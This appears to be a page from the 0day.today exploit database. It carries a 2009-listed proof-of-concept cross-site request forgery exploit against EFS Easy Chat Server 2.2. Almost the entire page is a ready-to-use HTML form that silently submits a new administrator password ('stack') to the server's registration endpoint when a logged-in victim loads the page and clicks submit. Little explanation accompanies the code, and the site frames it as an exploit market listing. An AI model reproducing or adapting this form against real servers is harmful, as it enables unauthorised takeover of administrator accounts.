[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9385
Category
remote exploits
Date add
03-03-2009
Platform
unsorted
===========================================================
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
===========================================================




<HTML>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server  http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
 -->
<HEAD>
<TITLE>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
        <TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
      </TR>
<TR>
        <TD> Username:
          <INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30"  value="stack"> *
</TD></TR>
<TR>
        <TD> Confirm Password:
          <INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
   <BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba</TEXTAREA>
</TD></TR>
<TR><TD align="center">
<INPUT type="submit" value="Click here to test" name=submit1>
<INPUT type="button" value="Close" name=button1 onclick="window.close();">
</TD></TR>
</form></TABLE>
</div>
<script language="JavaScript">
</script>
</BODY>
</HTML>




#  0day.today [2024-11-15]  #